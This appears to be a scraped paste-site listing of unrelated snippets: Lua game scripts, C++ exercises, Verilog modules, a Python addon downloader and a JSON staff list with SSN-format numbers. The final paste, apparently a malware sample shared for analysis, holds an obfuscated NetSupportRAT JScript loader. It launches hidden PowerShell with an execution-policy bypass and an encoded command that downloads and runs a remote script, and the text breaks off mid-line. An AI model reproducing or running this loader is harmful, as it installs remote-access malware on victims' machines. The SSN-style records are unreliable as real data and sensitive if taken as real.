draw_text_term(1, 11, ""Press Enter to continue..."", colors.gray, + wait = read() + setup_wizard() + else + monX, monY = mon.getSize() + draw_text_term(27, 6, ""success"",, + sleep(0.5) + end +draw_text_term(2, 7, ""saving configuration..."", colors.white, + +save_config() + +sleep(0.1) +draw_text_term(1, 9, ""Setup Complete!"",, +sleep(1) + +auto = auto_string == ""true"" +call_homepage() + +end +----------------SETUP------------------------------- + +function setup_wizard() + +term.clear() + + +draw_text_term(1, 1, ""Turbine Controls v""..version,, +draw_text_term(1, 2, ""Peripheral setup"", colors.white, +draw_text_term(1, 4, ""Step 1:"",, +draw_text_term(1, 5, ""-Place 3 wide x 4 tall advanced monitors next to computer."", colors.white, +draw_text_term(1, 7, ""Step 2:"",, +draw_text_term(1, 8, ""-Place a wired modem on this computer and on the "", colors.white, +draw_text_term(1, 9, "" computer port of the Turbine."", colors.white, +draw_text_term(1, 10, ""-connect modems with network cable."", colors.white, +draw_text_term(1, 11, ""-right click modems to activate."", colors.white, +draw_text_term(1, 13, ""Press Enter when ready..."", colors.gray, + +wait = read() +test_configs() + + +end + +-- peripheral searching thanks to /u/kla_sch +function turbineSearch() + local names = peripheral.getNames() + local i, name + for i, name in pairs(names) do + if peripheral.getType(name) == ""BiggerReactors_Turbine"" then + return peripheral.wrap(name) + else + --return null + end + end +end + +function monitorSearch() + local names = peripheral.getNames() + local i, name + for i, name in pairs(names) do + if peripheral.getType(name) == ""monitor"" then + test = name + return peripheral.wrap(name) + else + --return null + end + end +end + +function start() + --if configs exists, load values and test + if fs.exists(""turbine_config.txt"") then + load_config() + + test_configs() + else + setup_wizard() + end +end + +start()" +pBGuYELB,wo_ror_addons,Shuraken007,Python,Thursday 2nd of November 2023 12:03:54 PM CDT,"#!/usr/bin/python3.3 +import os.path +import urllib.request +import zipfile +from bs4 import BeautifulSoup +import requests +import re +import os + +TMP_DIR = ""C:\\tmp"" +DOWNLOADS_DIR_UNZIPPED = ""C:\\Games\\WOROR\\Interface\\AddOns"" +url = '' + +if not os.path.exists(TMP_DIR): + os.makedirs(TMP_DIR) + +reqs = requests.get(url) +soup = BeautifulSoup(reqs.text, 'html.parser') +urls = [] +links = [ '' + x.get('href') for x in soup.find_all(href=re.compile(""/download/""))] + +for link in links: + link = link.strip() + print('Link: ' + link) + name = link.rsplit('/', 4)[-4] + + filename = os.path.join(TMP_DIR, name) + + if not os.path.isfile(filename): + try: + urllib.request.urlretrieve(link, filename + '.zip') + with zipfile.ZipFile(filename + '.zip', 'r') as zip_ref: + print('Downloading: ' + DOWNLOADS_DIR_UNZIPPED + '/' + name) + zip_ref.extractall(DOWNLOADS_DIR_UNZIPPED) + except Exception as inst: + print(inst) + print(' Encountered unknown error. Continuing.')" +Ws7FidXr,Untitled,parv28,C++,Thursday 2nd of November 2023 12:03:41 PM CDT,"/* +class TreeNode { + public: + int data; + TreeNode* left; + TreeNode* right; + + TreeNode() { + } + + TreeNode(int data) { + this->data = data; + } + + TreeNode(int data, TreeNode* left, TreeNode* right) { + this->data = data; + this->left = left; + this->right = right; + } +}; +*/ + +class Solution { +public: + int pre_order_index = 0; + + int get_index(vector& inorder, int start, int end, int val) { + for(int i=start;i<=end;i++) { + if(inorder[i]==val) return i; + } + return end; + } + + TreeNode* constructTree(vector& preorder, vector& inorder, int start, int end) { + if(start>end) return nullptr; + + int curr_val = preorder[pre_order_index++]; + TreeNode* root = new TreeNode(curr_val); + + // search for the index in inorder + int index = get_index(inorder, start, end, curr_val); + + root->left = constructTree(preorder, inorder, start, index-1); + root->right = constructTree(preorder, inorder, index+1, end); + + return root; + } + + TreeNode* buildTree(vector& preorder, vector& inorder) { + int n = preorder.size(); + return constructTree(preorder, inorder, 0, n-1); + } +};" +pxFMBUzN,Untitled,MeehoweCK,C++,Thursday 2nd of November 2023 12:03:21 PM CDT,"// main.cpp +#include ""VolleyballSet.h"" + +int main() { + std::string vTeam1{ ""Polska"" }, vTeam2{ ""Brazylia"" }; + VolleyballSet volleyballSet{ vTeam1, vTeam2 }; +; + return 0; +} + +// VolleyballSet.h +#pragma once +#include + +class VolleyballSet { + std::string mTeam1; + std::string mTeam2; + short int mPointsRequired{ 25 }; + short int mPointsTeam1{ 0 }; + short int mPointsTeam2{ 0 }; + bool continueSet() const; + void givePoint(); + void printResult() const; + void printStatus() const; +public: + VolleyballSet(const std::string& aTeam1, const std::string& aTeam2) : mTeam1(aTeam1), mTeam2(aTeam2) {} + void play(); +}; + +// VolleyballSet.cpp +#include ""VolleyballSet.h"" +#include +#include +#include + +void VolleyballSet::play() { + do { + printStatus(); + _getch(); + givePoint(); + } while (continueSet()); + printResult(); +} + +bool VolleyballSet::continueSet() const { + if (mPointsTeam1 >= mPointsRequired) { + if (mPointsTeam1 - mPointsTeam2 > 1) { + return false; + } + } + if (mPointsTeam2 >= mPointsRequired) { + if (mPointsTeam2 - mPointsTeam1 > 1) { + return false; + } + } + return true; +} + +void VolleyballSet::givePoint() { + srand(time(nullptr)); + rand() % 2 == 0 ? ++mPointsTeam1 : ++mPointsTeam2; +} + +void VolleyballSet::printResult() const { + if (mPointsTeam1 > mPointsTeam2) { + std::cout << ""Druzyna "" << mTeam1 << "" wygrywa set "" << mPointsTeam1 << ':' << mPointsTeam2 << std::endl; + } + else { + std::cout << ""Druzyna "" << mTeam2 << "" wygrywa set "" << mPointsTeam2 << ':' << mPointsTeam1 << std::endl; + } +} + +void VolleyballSet::printStatus() const { + std::cout << mTeam1 << '\t' << mPointsTeam1 << ':' << mPointsTeam2 << '\t' << mTeam2 << std::endl; +}" +wuc7nrVX,Untitled,Josif_tepe,C++,Thursday 2nd of November 2023 12:02:16 PM CDT,"#include +#include +#include +#include +#include +using namespace std; +const int maxn = 2e5 + 10; +const int logn = 24; +int n; +vector graph[maxn]; +int timer = 0; +int in_dfs[maxn], out_dfs[maxn]; +int parent[maxn]; +int up_node[maxn][logn]; + +void dfs(int node, int parent) { + timer++; + in_dfs[node] = timer; + up_node[node][0] = parent; + + for(int i = 1; i < logn; i++) { + up_node[node][i] = up_node[up_node[node][i - 1]][i - 1]; + } + for(int neighbour : graph[node]) { + if(neighbour != parent) { + dfs(neighbour, node); + } + } + timer++; + out_dfs[node] = timer; + +} +bool is_ancestor(int A, int B) { + if(in_dfs[A] <= in_dfs[B] and out_dfs[A] >= out_dfs[B]) { + return true; + } + return false; +} +int LCA(int A, int B) { + if(is_ancestor(A, B)) { + return A; + } + if(is_ancestor(B, A)) { + return B; + } + for(int i = logn - 1; i >= 0; i--) { + if(!is_ancestor(up_node[A][i], B)) { + A = up_node[A][i]; + } + } +// cout << A << endl; + return up_node[A][0]; +} +int main() { + int q; + cin >> n >> q; + parent[1] = 0; + for(int i = 2; i <= n; i++) { + int p; + cin >> p; + + graph[i].push_back(p); + graph[p].push_back(i); + parent[i] = p; + } + dfs(1, 1); + + + for(int i = 0; i < q; i++) { + int a, b; + cin >> a >> b; + cout << LCA(a, b) << endl; + } + + return 0; +} + +/* + 12 + 1 2 + 2 4 + 2 5 + 4 7 + 5 8 + 1 3 + 3 6 + 6 9 + 6 10 + 6 11 + 11 12 + + **/ +" +kr7hYapG,People,bulgakoff08,JSON,Thursday 2nd of November 2023 11:53:03 AM CDT,"[ + {""ssn"":""698-21-1037"", ""firstName"":""Airi"", ""lastName"":""Satoru"", ""gender"":""M"", ""age"":33, ""office"":""Tokyo"", ""department"":""Accounting"", ""position"":""Accountant"", ""fullTime"":""Y"", ""profession"":""General"", ""salary"":162700, ""employDate"":""2008-11-27T22:00:00.000Z""}, + {""ssn"":""401-90-8422"", ""firstName"":""Alex"", ""lastName"":""Popov"", ""gender"":""M"", ""age"":22, ""office"":""Edinburgh"", ""department"":""Development"", ""position"":""Junior AJAX Developer"", ""fullTime"":""N"", ""profession"":""Technical"", ""salary"":24400, ""employDate"":""2019-09-04T07:37:34.065Z""}, + {""ssn"":""544-37-4095"", ""firstName"":""Angelica"", ""lastName"":""Ramos"", ""gender"":""F"", ""age"":47, ""office"":""London"", ""department"":""Management"", ""position"":""Chief Executive Officer"", ""fullTime"":""Y"", ""profession"":""Management"", ""salary"":1200000, ""employDate"":""2009-10-08T21:00:00.000Z""}, + {""ssn"":""458-99-4226"", ""firstName"":""Ashton"", ""lastName"":""Cox"", ""gender"":""M"", ""age"":66, ""office"":""San Francisco"", ""department"":""Inventory"", ""position"":""Junior Technical Author"", ""fullTime"":""N"", ""profession"":""General"", ""salary"":86000, ""employDate"":""2009-01-11T22:00:00.000Z""}, + {""ssn"":""611-84-5317"", ""firstName"":""Bradley"", ""lastName"":""Greer"", ""gender"":""M"", ""age"":41, ""office"":""London"", ""department"":""Development"", ""position"":""Software Engineer"", ""fullTime"":""Y"", ""profession"":""Technical"", ""salary"":132000, ""employDate"":""2012-10-12T21:00:00.000Z""}, + {""ssn"":""197-35-0709"", ""firstName"":""Brenden"", ""lastName"":""Wagner"", ""gender"":""M"", ""age"":28, ""office"":""San Francisco"", ""department"":""Development"", ""position"":""Software Engineer"", ""fullTime"":""Y"", ""profession"":""Technical"", ""salary"":206850, ""employDate"":""2011-06-06T21:00:00.000Z""}, + {""ssn"":""172-62-3669"", ""firstName"":""Braille"", ""lastName"":""Williamson"", ""gender"":""F"", ""age"":61, ""office"":""New York"", ""department"":""Support"", ""position"":""Integration Specialist"", ""fullTime"":""Y"", ""profession"":""Technical"", ""salary"":372000, ""employDate"":""2012-12-01T22:00:00.000Z""}, + {""ssn"":""735-74-0554"", ""firstName"":""Bruno"", ""lastName"":""Nash"", ""gender"":""M"", ""age"":38, ""office"":""London"", ""department"":""Development"", ""position"":""Software Engineer"", ""fullTime"":""Y"", ""profession"":""Technical"", ""salary"":163500, ""employDate"":""2011-05-02T21:00:00.000Z""}, + {""ssn"":""809-14-1134"", ""firstName"":""Caesar"", ""lastName"":""Vance"", ""gender"":""M"", ""age"":21, ""office"":""New York"", ""department"":""Support"", ""position"":""Presales Support"", ""fullTime"":""Y"", ""profession"":""General"", ""salary"":106450, ""employDate"":""2011-12-11T22:00:00.000Z""}, + {""ssn"":""103-23-9896"", ""firstName"":""Cara"", ""lastName"":""Stevens"", ""gender"":""F"", ""age"":46, ""office"":""New York"", ""department"":""Sales"", ""position"":""Sales Assistant"", ""fullTime"":""Y"", ""profession"":""General"", ""salary"":145600, ""employDate"":""2011-12-05T22:00:00.000Z""}, + {""ssn"":""562-58-5439"", ""firstName"":""Cedric"", ""lastName"":""Kelly"", ""gender"":""M"", ""age"":22, ""office"":""Edinburgh"", ""department"":""Development"", ""position"":""Senior Javascript Developer"", ""fullTime"":""Y"", ""profession"":""Technical"", ""salary"":433060, ""employDate"":""2012-03-28T21:00:00.000Z""}, + {""ssn"":""435-17-0143"", ""firstName"":""Chard"", ""lastName"":""Marshall"", ""gender"":""F"", ""age"":36, ""office"":""San Francisco"", ""department"":""Management"", ""position"":""Regional Director"", ""fullTime"":""Y"", ""profession"":""Management"", ""salary"":470600, ""employDate"":""2008-10-15T21:00:00.000Z""}, + {""ssn"":""174-94-6130"", ""firstName"":""Colleen"", ""lastName"":""Hurst"", ""gender"":""M"", ""age"":39, ""office"":""San Francisco"", ""department"":""Development"", ""position"":""Javascript Developer"", ""fullTime"":""Y"", ""profession"":""Technical"", ""salary"":205500, ""employDate"":""2009-09-14T21:00:00.000Z""}, + {""ssn"":""727-94-4819"", ""firstName"":""Dai"", ""lastName"":""Rios"", ""gender"":""M"", ""age"":35, ""office"":""Edinburgh"", ""department"":""Management"", ""position"":""Personnel Lead"", ""fullTime"":""Y"", ""profession"":""Management"", ""salary"":217500, ""employDate"":""2012-09-25T21:00:00.000Z""}, + {""ssn"":""800-71-8019"", ""firstName"":""Donna"", ""lastName"":""Snider"", ""gender"":""F"", ""age"":27, ""office"":""New York"", ""department"":""Support"", ""position"":""Customer Support"", ""fullTime"":""Y"", ""profession"":""General"", ""salary"":112000, ""employDate"":""2011-01-24T22:00:00.000Z""}, + {""ssn"":""726-76-9921"", ""firstName"":""Doris"", ""lastName"":""Wilder"", ""gender"":""F"", ""age"":23, ""office"":""Sidney"", ""department"":""Sales"", ""position"":""Sales Assistant"", ""fullTime"":""N"", ""profession"":""General"", ""salary"":85600, ""employDate"":""2010-09-19T21:00:00.000Z""}, + {""ssn"":""650-34-2667"", ""firstName"":""Finn"", ""lastName"":""Camacho"", ""gender"":""M"", ""age"":47, ""office"":""San Francisco"", ""department"":""Support"", ""position"":""Support Engineer"", ""fullTime"":""N"", ""profession"":""Technical"", ""salary"":87500, ""employDate"":""2009-07-06T21:00:00.000Z""}, + {""ssn"":""277-75-4031"", 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""gender"":""M"", ""age"":42, ""office"":""Edinburgh"", ""department"":""Development"", ""position"":""Developer"", ""fullTime"":""N"", ""profession"":""Technical"", ""salary"":92575, ""employDate"":""2010-12-21T22:00:00.000Z""}, + {""ssn"":""454-68-2098"", ""firstName"":""Gloria"", ""lastName"":""Little"", ""gender"":""F"", ""age"":59, ""office"":""New York"", ""department"":""Information Technologies"", ""position"":""Systems Administrator"", ""fullTime"":""Y"", ""profession"":""Technical"", ""salary"":237500, ""employDate"":""2009-04-09T21:00:00.000Z""}, + {""ssn"":""424-58-8544"", ""firstName"":""Haley"", ""lastName"":""Kennedy"", ""gender"":""F"", ""age"":43, ""office"":""London"", ""department"":""Advertisement"", ""position"":""Senior Marketing Designer"", ""fullTime"":""Y"", ""profession"":""General"", ""salary"":313500, ""employDate"":""2012-12-17T22:00:00.000Z""}, + {""ssn"":""720-23-5609"", ""firstName"":""Hermione"", ""lastName"":""Butler"", ""gender"":""F"", ""age"":47, ""office"":""London"", ""department"":""Management"", ""position"":""Regional Director"", ""fullTime"":""Y"", ""profession"":""Management"", ""salary"":356250, ""employDate"":""2011-03-20T22:00:00.000Z""}, + {""ssn"":""119-92-9522"", ""firstName"":""Herod"", ""lastName"":""Chandler"", ""gender"":""M"", ""age"":59, ""office"":""San Francisco"", ""department"":""Sales"", ""position"":""Sales Assistant"", ""fullTime"":""Y"", ""profession"":""General"", ""salary"":137500, ""employDate"":""2012-08-05T21:00:00.000Z""}, + {""ssn"":""262-61-1588"", ""firstName"":""Hope"", ""lastName"":""Fuentes"", ""gender"":""F"", ""age"":41, ""office"":""San Francisco"", ""department"":""Inventory"", ""position"":""Secretary"", ""fullTime"":""Y"", ""profession"":""General"", ""salary"":109850, ""employDate"":""2010-02-11T22:00:00.000Z""}, + {""ssn"":""113-67-1129"", ""firstName"":""Howard"", ""lastName"":""Hatfield"", ""gender"":""M"", ""age"":51, ""office"":""San Francisco"", ""department"":""Inventory"", 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""salary"":86500, ""employDate"":""2010-07-13T21:00:00.000Z""}, + {""ssn"":""559-69-0244"", ""firstName"":""Lael"", ""lastName"":""Greer"", ""gender"":""M"", ""age"":21, ""office"":""London"", ""department"":""Information Technologies"", ""position"":""Systems Administrator"", ""fullTime"":""Y"", ""profession"":""Technical"", ""salary"":103500, ""employDate"":""2009-02-26T22:00:00.000Z""}, + {""ssn"":""618-49-1337"", ""firstName"":""Martina"", ""lastName"":""Mccray"", ""gender"":""F"", ""age"":46, ""office"":""Edinburgh"", ""department"":""Support"", ""position"":""Sales Support"", ""fullTime"":""Y"", ""profession"":""General"", ""salary"":324050, ""employDate"":""2011-03-08T22:00:00.000Z""}, + {""ssn"":""288-28-3828"", ""firstName"":""Michael"", ""lastName"":""Bruce"", ""gender"":""M"", ""age"":29, ""office"":""Singapore"", ""department"":""Development"", ""position"":""Javascript Developer"", ""fullTime"":""Y"", ""profession"":""Technical"", ""salary"":183000, ""employDate"":""2011-06-26T21:00:00.000Z""}, + {""ssn"":""242-50-8525"", ""firstName"":""Michael"", ""lastName"":""Silva"", ""gender"":""M"", ""age"":66, ""office"":""London"", ""department"":""Advertisement"", ""position"":""Marketing Designer"", ""fullTime"":""Y"", ""profession"":""General"", ""salary"":198500, ""employDate"":""2012-11-26T22:00:00.000Z""}, + {""ssn"":""477-57-3419"", ""firstName"":""Michelle"", ""lastName"":""House"", ""gender"":""F"", ""age"":37, ""office"":""Sidney"", ""department"":""Support"", ""position"":""Integration Specialist"", ""fullTime"":""N"", ""profession"":""Technical"", ""salary"":95400, ""employDate"":""2011-06-01T21:00:00.000Z""}, + {""ssn"":""592-61-1531"", ""firstName"":""Olivia"", ""lastName"":""Liang"", ""gender"":""F"", ""age"":64, ""office"":""Singapore"", ""department"":""Support"", ""position"":""Support Engineer"", ""fullTime"":""Y"", ""profession"":""Technical"", ""salary"":234500, ""employDate"":""2011-02-02T22:00:00.000Z""}, + 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""lastName"":""Davidson"", ""gender"":""F"", ""age"":55, ""office"":""Tokyo"", ""department"":""Support"", ""position"":""Integration Specialist"", ""fullTime"":""Y"", ""profession"":""Technical"", ""salary"":327900, ""employDate"":""2010-10-13T21:00:00.000Z""}, + {""ssn"":""463-68-9850"", ""firstName"":""Sakura"", ""lastName"":""Yamamoto"", ""gender"":""F"", ""age"":37, ""office"":""Tokyo"", ""department"":""Support"", ""position"":""Support Engineer"", ""fullTime"":""Y"", ""profession"":""Technical"", ""salary"":139575, ""employDate"":""2009-08-18T21:00:00.000Z""}, + {""ssn"":""284-43-2868"", ""firstName"":""Serge"", ""lastName"":""Baldwin"", ""gender"":""M"", ""age"":64, ""office"":""Singapore"", ""department"":""Marketing"", ""position"":""Data Coordinator"", ""fullTime"":""Y"", ""profession"":""General"", ""salary"":138575, ""employDate"":""2012-04-08T21:00:00.000Z""}, + {""ssn"":""722-63-9562"", ""firstName"":""Shad"", ""lastName"":""Decker"", ""gender"":""M"", ""age"":51, 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""position"":""Developer"", ""fullTime"":""Y"", ""profession"":""Technical"", ""salary"":114500, ""employDate"":""2009-10-21T21:00:00.000Z""}, + {""ssn"":""521-59-3725"", ""firstName"":""Tatyana"", ""lastName"":""Fitzpatrick"", ""gender"":""F"", ""age"":19, ""office"":""London"", ""department"":""Management"", ""position"":""Regional Director"", ""fullTime"":""Y"", ""profession"":""Management"", ""salary"":385750, ""employDate"":""2010-03-16T22:00:00.000Z""}, + {""ssn"":""203-50-9332"", ""firstName"":""Thor"", ""lastName"":""Walton"", ""gender"":""M"", ""age"":61, ""office"":""New York"", ""department"":""Development"", ""position"":""Developer"", ""fullTime"":""N"", ""profession"":""Technical"", ""salary"":98540, ""employDate"":""2013-08-10T21:00:00.000Z""}, + {""ssn"":""731-48-4893"", ""firstName"":""Tiger"", ""lastName"":""Nixon"", ""gender"":""M"", ""age"":61, ""office"":""Edinburgh"", ""department"":""Development"", ""position"":""System Architect"", ""fullTime"":""Y"", ""profession"":""Technical"", ""salary"":320800, ""employDate"":""2011-04-24T21:00:00.000Z""}, + {""ssn"":""158-77-9818"", ""firstName"":""Timothy"", ""lastName"":""Mooney"", ""gender"":""M"", ""age"":37, ""office"":""London"", ""department"":""Inventory"", ""position"":""Office Manager"", ""fullTime"":""Y"", ""profession"":""Management"", ""salary"":136200, ""employDate"":""2008-12-10T22:00:00.000Z""}, + {""ssn"":""863-75-3805"", ""firstName"":""Unity"", ""lastName"":""Butler"", ""gender"":""M"", ""age"":47, ""office"":""San Francisco"", ""department"":""Advertisement"", ""position"":""Marketing Designer"", ""fullTime"":""N"", ""profession"":""General"", ""salary"":85675, ""employDate"":""2009-12-08T22:00:00.000Z""}, + {""ssn"":""625-88-1262"", ""firstName"":""Vivian"", ""lastName"":""Harrell"", ""gender"":""F"", ""age"":62, ""office"":""San Francisco"", ""department"":""Finance"", ""position"":""Financial Controller"", ""fullTime"":""Y"", ""profession"":""Management"", ""salary"":452500, ""employDate"":""2009-02-13T22:00:00.000Z""}, + {""ssn"":""291-42-0274"", ""firstName"":""Yuri"", ""lastName"":""Berry"", ""gender"":""M"", ""age"":40, ""office"":""New York"", ""department"":""Marketing"", ""position"":""Chief Marketing Officer"", ""fullTime"":""Y"", ""profession"":""Management"", ""salary"":675000, ""employDate"":""2009-06-24T21:00:00.000Z""}, + {""ssn"":""494-90-1069"", ""firstName"":""Zenaida"", ""lastName"":""Frank"", ""gender"":""F"", ""age"":63, ""office"":""New York"", ""department"":""Development"", ""position"":""Software Engineer"", ""fullTime"":""Y"", ""profession"":""Technical"", ""salary"":125250, ""employDate"":""2010-01-03T22:00:00.000Z""}, + {""ssn"":""821-36-9283"", ""firstName"":""Zorina"", ""lastName"":""Serrano"", ""gender"":""F"", ""age"":56, ""office"":""San Francisco"", ""department"":""Development"", ""position"":""Software Engineer"", ""fullTime"":""Y"", ""profession"":""Technical"", ""salary"":115000, ""employDate"":""2012-05-31T21:00:00.000Z""} +]" +5mrLReyg,patt,STANAANDREY,VeriLog,Thursday 2nd of November 2023 11:48:48 AM CDT,"module patt( + input clk, rst, + input x, + output reg o +); + localparam S0 = 0, S1 = 1, S2 = 2, S3 = 3, S4 = 4; + reg st, st_nxt; + always @(*) + case (st) + S0: + if (x) st_nxt = S1; + else st_nxt = S0; + S1: + if (!x) st_nxt = S2; + else st_nxt = S1; + S2: + if (x) st_nxt = S3; + else st_nxt = S0; + S3: + if (x) st_nxt = S4; + else st_nxt = S2; + S4: + if (x) st_nxt = S1; + else st_nxt = S2; + endcase + always @(*) begin + o = 0; + case (st) + S3: if (x) o = 1; + endcase + end + always @(posedge clk, negedge rst) + if (!rst) st <= S0; + else st <= st_nxt; +endmodule + + +module patt_tb; + reg clk, rst, x; + wire o; + patt inst(.clk(clk), .rst(rst), .x(x)); + localparam CLK_PERIOD = 100, RST_PULSE = 10, CLK_CYCLES = 5; + initial begin + clk = 0; + repeat (2*CLK_CYCLES) + #(CLK_PERIOD/2) clk=~clk; + end + initial begin + rst = 0; + #(RST_PULSE) rst = 1; + end + initial begin + x=0; + #(1*CLK_PERIOD) x=0; + #(1*CLK_PERIOD) x=1; + #(1*CLK_PERIOD) x=1; + end +endmodule +" +WdYZiPr8,modals,Arexils,Python,Thursday 2nd of November 2023 11:36:10 AM CDT,"class NameModal(miru.Modal): + name = miru.TextInput( + label='Name', + required=True, + ) + + async def callback(self, ctx: miru.ModalContext) -> None: + await ctx.respond(f""Your name: `{}`"") + + +class BasicView(miru.View): + @miru.button(label='Input name', style=hikari.ButtonStyle.PRIMARY) + async def modal_button(self, button: miru.Button, ctx: miru.ViewContext) -> None: + modal = NameModal(title='Your name?') + await ctx.respond_with_modal(modal) + + +@command_test.child() +@lightbulb.command( + 'test_1', + 'nothing', + pass_options=True, + auto_defer=True, +) +@lightbulb.implements(lightbulb.SlashSubCommand) +async def command_test_1( + ctx: lightbulb.Context, +): + view = BasicView(timeout=60) + message = await ctx.respond(components=view) + await view.start(message) + + # How to get value from modal here. But not in callback + value_from_modal = '?' +" +507tzvTB,test,Royalzombie222,Lua,Thursday 2nd of November 2023 11:34:12 AM CDT," + +function godKit(plr) + commands.exec(""give ""..plr.."" netherite_axe{Enchantments:[{id:sharpness,lvl:255},{id:fire_aspect,lvl:1}],Unbreakable:1,affix_data:{rarity:'rare', affixes:{'apotheosis:socket':6.0}}}"") + commands.exec(""give ""..plr.."" netherite_pickaxe{Enchantments:[{id:efficiency,lvl:4},{id:fortune,lvl:5}],Unbreakable:1,affix_data:{rarity:'rare', affixes:{'apotheosis:socket':6.0}}}"") + commands.exec(""give ""..plr.."" netherite_shovel{Enchantments:[{id:efficiency,lvl:4}],Unbreakable:1,affix_data:{rarity:'rare', affixes:{'apotheosis:socket':6.0}}}"") + commands.exec(""give ""..plr.."" netherite_sword{Enchantments:[{id:sharpness,lvl:255}],Unbreakable:1,affix_data:{rarity:'rare', affixes:{'apotheosis:socket':6.0}}}"") + commands.exec(""give ""..plr.."" netherite_helmet{Enchantments:[{id:protection,lvl:255}],Unbreakable:1,affix_data:{rarity:'rare', affixes:{'apotheosis:socket':6.0}}}"") + commands.exec(""give ""..plr.."" netherite_chestplate{Enchantments:[{id:protection,lvl:255}],Unbreakable:1,affix_data:{rarity:'rare', affixes:{'apotheosis:socket':6.0}}}"") + commands.exec(""give ""..plr.."" netherite_leggings{Enchantments:[{id:protection,lvl:255}],Unbreakable:1,affix_data:{rarity:'rare', affixes:{'apotheosis:socket':6.0}}}"") + commands.exec(""give ""..plr.."" netherite_boots{Enchantments:[{id:protection,lvl:255}],Unbreakable:1,affix_data:{rarity:'rare', affixes:{'apotheosis:socket':6.0}}}"") +end + +godKit(""Butt_Hunter69"") +" +24YbZKEw,31. Infamous {Registro},elirosecodes,HTML,Thursday 2nd of November 2023 11:27:02 AM CDT,"
this is infamous
registro de fama simple
Texto descriptivo sobre el registro.
+ +
Nombre del personaje
Descripción del personaje/fama.
+ +
" +jJ8PyFJy,Untitled,soyl,Java,Thursday 2nd of November 2023 11:25:07 AM CDT,"import UI.controller.FilmController; +import UI.model.Film; +import com.fasterxml.jackson.databind.ObjectMapper; +import org.junit.jupiter.api.Test; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.boot.test.autoconfigure.web.servlet.WebMvcTest; +import org.springframework.boot.test.mock.mockito.MockBean; +import org.springframework.http.MediaType; +import org.springframework.test.web.servlet.MockMvc; + +import java.time.LocalDate; + +import static; +import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status; + +@WebMvcTest(FilmController.class) +public class FilmControllerTest { + + @Autowired + private MockMvc mockMvc; + + @MockBean + private FilmController filmController; + + private ObjectMapper objectMapper = new ObjectMapper(); + + @Test + public void testCheckBodyWhenFilmNameIsEmptyThenThrowValidationException() throws Exception { + Film film = new Film(1,""ab"",""dec"",,2); + mockMvc.perform(post(""/film"") + .content(objectMapper.writeValueAsString(film)) + .contentType(MediaType.APPLICATION_JSON)) + .andExpect(status().isBadRequest()); + } + + @Test + public void testCheckBodyWhenFilmDescriptionIsLongerThan200CharactersThenThrowValidationException() throws Exception { + String longDescription = new String(new char[201]).replace(""\0"", ""a""); + Film film = new Film(1,""ab"",longDescription,, 120); + mockMvc.perform(post(""/film"") + .content(objectMapper.writeValueAsString(film)) + .contentType(MediaType.APPLICATION_JSON)) + .andExpect(status().isBadRequest()); + } + + @Test + public void testCheckBodyWhenFilmReleaseDateIsBefore28thDecember1895ThenThrowValidationException() throws Exception { + Film film = new Film(1,""dec"",""description"", LocalDate.of(1895, 12, 27), 120); + mockMvc.perform(post(""/film"") + .content(objectMapper.writeValueAsString(film)) + .contentType(MediaType.APPLICATION_JSON)) + .andExpect(status().isBadRequest()); + } + + @Test + public void testCheckBodyWhenFilmDurationIsZeroThenThrowValidationException() throws Exception { + Film film = new Film(1,""ab"",""dec"",, 0); + mockMvc.perform(post(""/film"") + .content(objectMapper.writeValueAsString(film)) + .contentType(MediaType.APPLICATION_JSON)) + .andExpect(status().isBadRequest()); + } + + @Test + public void testCheckBodyWhenFilmIsValidThenNoExceptionThrown() throws Exception { + Film film = new Film(1,""ab"",""dec"",, 120); + mockMvc.perform(post(""/film"") + .content(objectMapper.writeValueAsString(film)) + .contentType(MediaType.APPLICATION_JSON)) + .andExpect(status().isOk()); + } +}" +qHfFgwdx,sadd,STANAANDREY,VeriLog,Thursday 2nd of November 2023 11:16:41 AM CDT,"module sadd( + input clk, rst, + input x, y, + output reg z +); + localparam S0 = 0, S1 = 1; + reg st, st_nxt; + always @(*) + case (st) + S0: + if (x & y) st_nxt = S1; + else st_nxt = S0; + S1: + if ((~x) & (~y)) st_nxt = S0; + else st_nxt = S1; + endcase + + always @(*) begin + z = 0; + case (st) + S0: + if (x ^ y) z = 1; + S1: + if (x ~^ y) z = 1; + endcase + end + + always @(posedge clk, negedge rst) + if (!rst) st <= S0; + else st <= st_nxt; +endmodule + + +module sadd_tb; + reg clk, rst, x, y; + wire z; + sadd inst(.clk(clk), .rst(rst), .x(x), .y(y)); + localparam CLK_PERIOD = 100, RST_PULSE = 10, CLK_CYCLES = 5; + initial begin + clk = 0; + repeat (2*CLK_CYCLES) + #(CLK_PERIOD/2) clk=~clk; + end + initial begin + rst = 0; + #(RST_PULSE) rst = 1; + end + initial begin + {x,y}='b01; + #(1*CLK_PERIOD) {x,y}='b10; + #(1*CLK_PERIOD) {x,y}='b11; + #(1*CLK_PERIOD) {x,y}='b00; + end + +endmodule +" +CwHR0Ji2,NetSupportRAT - Obfuscated JavaScript - Deobfuscated 2,brianyaucy,JavaScript,Thursday 2nd of November 2023 11:15:36 AM CDT,"//UmExrsgJuDvLhVadkAWOTICPXF +oMKilXfTnLOHCUhAFBP = ""sheLl""; YZqOsTxnMmpABJCF = new ActiveXObject(oMKilXfTnLOHCUhAFBP+"".""+ //IxqOgMKi +""ApPlIcAtIon""); FkLgcBCiVTGsmxdvpeb = new ActiveXObject(""SCRiPtIng.filesystemobJECt""); if (FkLgcBCiVTGsmxdvpeb.FolderExists(""C:\\pROgRa""+ //IxqOgMKi +""mdAta\\mIcRosOft\\wINdoWs"")) { +//YhALZvBkfyGVcEPoHRNqIM +YZqOsTxnMmpABJCF.ShellExecute(""cmd"", ""/c""+ //IxqOgMKi +"" Power""+oMKilXfTnLOHCUhAFBP+"" -nop -w hidden ""+ //IxqOgMKi +""-ep bypaSS -enC SQ""+ //IxqOgMKi +""BFAFgAIAAoA""+ //IxqOgMKi +""E4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAb""+ //IxqOgMKi +""gB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHI""+ //IxqOgMKi +""AaQBuAGcAKA""+ //IxqOgMKi +""AiAGgAdAB0AHAA""+ //IxqOgMKi +""OgAvAC8""+ //IxqOgMKi +""AMQBvAHQ""+ //IxqOgMKi +""AYQBsAC4AYwBvAG0ALwBpAG4AZABlAHgALwBpAG4AZA""+ //IxqOgMKi +""BlAHgALgBwAGgAcAAiACkA"", """", ""open"", 0); } +//kdbyVceRuXIHitqmTjngWxOZAG +//UmExrsgJuDvLhVadkAWOTICPXF +oMKilXfTnLOHCUhAFBP = 